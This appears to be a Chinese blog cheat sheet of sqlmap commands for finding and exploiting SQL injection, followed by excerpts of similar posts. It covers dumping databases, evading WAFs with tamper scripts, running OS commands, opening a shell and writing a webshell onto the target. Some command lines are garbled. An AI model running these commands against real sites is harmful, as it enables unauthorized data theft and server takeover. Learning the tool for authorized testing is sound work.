SqlMap常用命令

2021-10-18 06:58:05 字數 2146 閱讀 4967

sqlmap是我們常用的一款sql注入漏洞檢測工具,為了方便大家平時的使用,在此分享一下我總結的一下命令。

目錄結構:

extra:額外功能

lib:連線庫,注入引數,提權操作

tamper:繞過指令碼

thirdparty:第三方外掛程式

txt:字典,例如瀏覽器**,表,列,關鍵字

udf:自定義攻擊載荷

waf:常見防火牆特徵–identify-waf

常用命令:

1.注入檢測方式:

get方式:sqlmap.py -u "url"

post方式:sqlmap.py -u "url"

-date "post資料"

cookie方式:sqlmap.py -u "url"

-cookie "cookie資料"

2.獲取資料庫資訊

獲取資料庫型別以及版本:sqlmap.py -u "url"

獲取**使用的資料庫名和使用者名稱:sqlmap.py -u "url"

--current-db

sqlmap.py -u "url"

--current-user

3.獲取資料量和使用者許可權

獲取資料庫的資料量:sqlmap.py -u "url"

--count -d "資料庫名"

判斷使用者許可權:sqlmap.py -u "url"

--privileges

4.mysql注入

mysql結構:庫-表-列-資料(字段內容)

注入順序:

首先獲取當前庫名:sqlmap.py -u "url"

--current-db

其次獲取庫中表名:sqlmap.py -u "url"

--tables -d "資料庫名"

然後獲取庫中某個表的列名:sqlmap.py -u "url"

--columns -t "表名"

-d "庫名"

最後獲取庫中某個表名的某個列名的字段內容:sqlmap.py -u "url"

--dump -c "列名"

-t "表名"

-d "庫名"

5.管理資料庫

//girhub/pymysql/pymysql)

--sqlshell

6.延時注入

針對頁面無變化,無法用布林真假判斷,無法報錯的情況下注入。

sqlmap.py -u "url"

--delay 數字值(秒為單位)

sqlmap.py -u "url"

-safe-freq

7.互動式命令執行和寫webshell

命令執行:sqlmap.py -u "url"

--os-cmd=

"命令"

webshell:sqlmap.py -u "url"

--os-shell

8.tamper指令碼

sqlmap.py -u "url"

--tamper=

"指令碼名字"

9.本地寫入webshell

sqlmap.py -u "url"--

file

-write "本地檔案路徑"--

file

-dest "目標檔案路徑"

10.批量檢測注入漏洞

sqlmap.py -m 本地檔案路徑

結合burpsuite:sqlmap.py -l 本地檔案路徑 -

-batch -smart

//batch:自動選擇yes,smart:啟發式快速判斷

//瀏覽器**

--level=(1

-5)//測試水平等級

--risk=(0

-3)//風險等級

sqlmap常用命令

1.找到注入點url 2.sqlmap u url v 1 dbs 列出資料庫 或者 sqlmap u url v 1 current db 顯示當前資料庫 3.sqlmap u url v 1 users 列出資料庫使用者 current user當前資料庫使用者 4.sqlmap u url v...

sqlmap常用命令

sqlmap.py u current db 獲取當前資料庫名稱 sqlmap.py u tables d db name 列出指定資料庫的所有表名 列出指定資料庫 指定表的欄位名 列出指定資料庫 指定表 指定欄位的內容,c column name 可以省略,省略的話會列出當前表的所有字段內容 攜帶...

SQLmap常用命令

使用sqlmap掃瞄時,http頭部字段 useragent包含sqlmap等敏感字元可能會被waf攔截 可以採用模擬搜尋引擎訪問 user agent 搜尋引擎http頭 自定義useragent,防止cc流量攔截 delay 1 設定延遲時間 safe freq 3 請求延遲繞過一些waf可以使...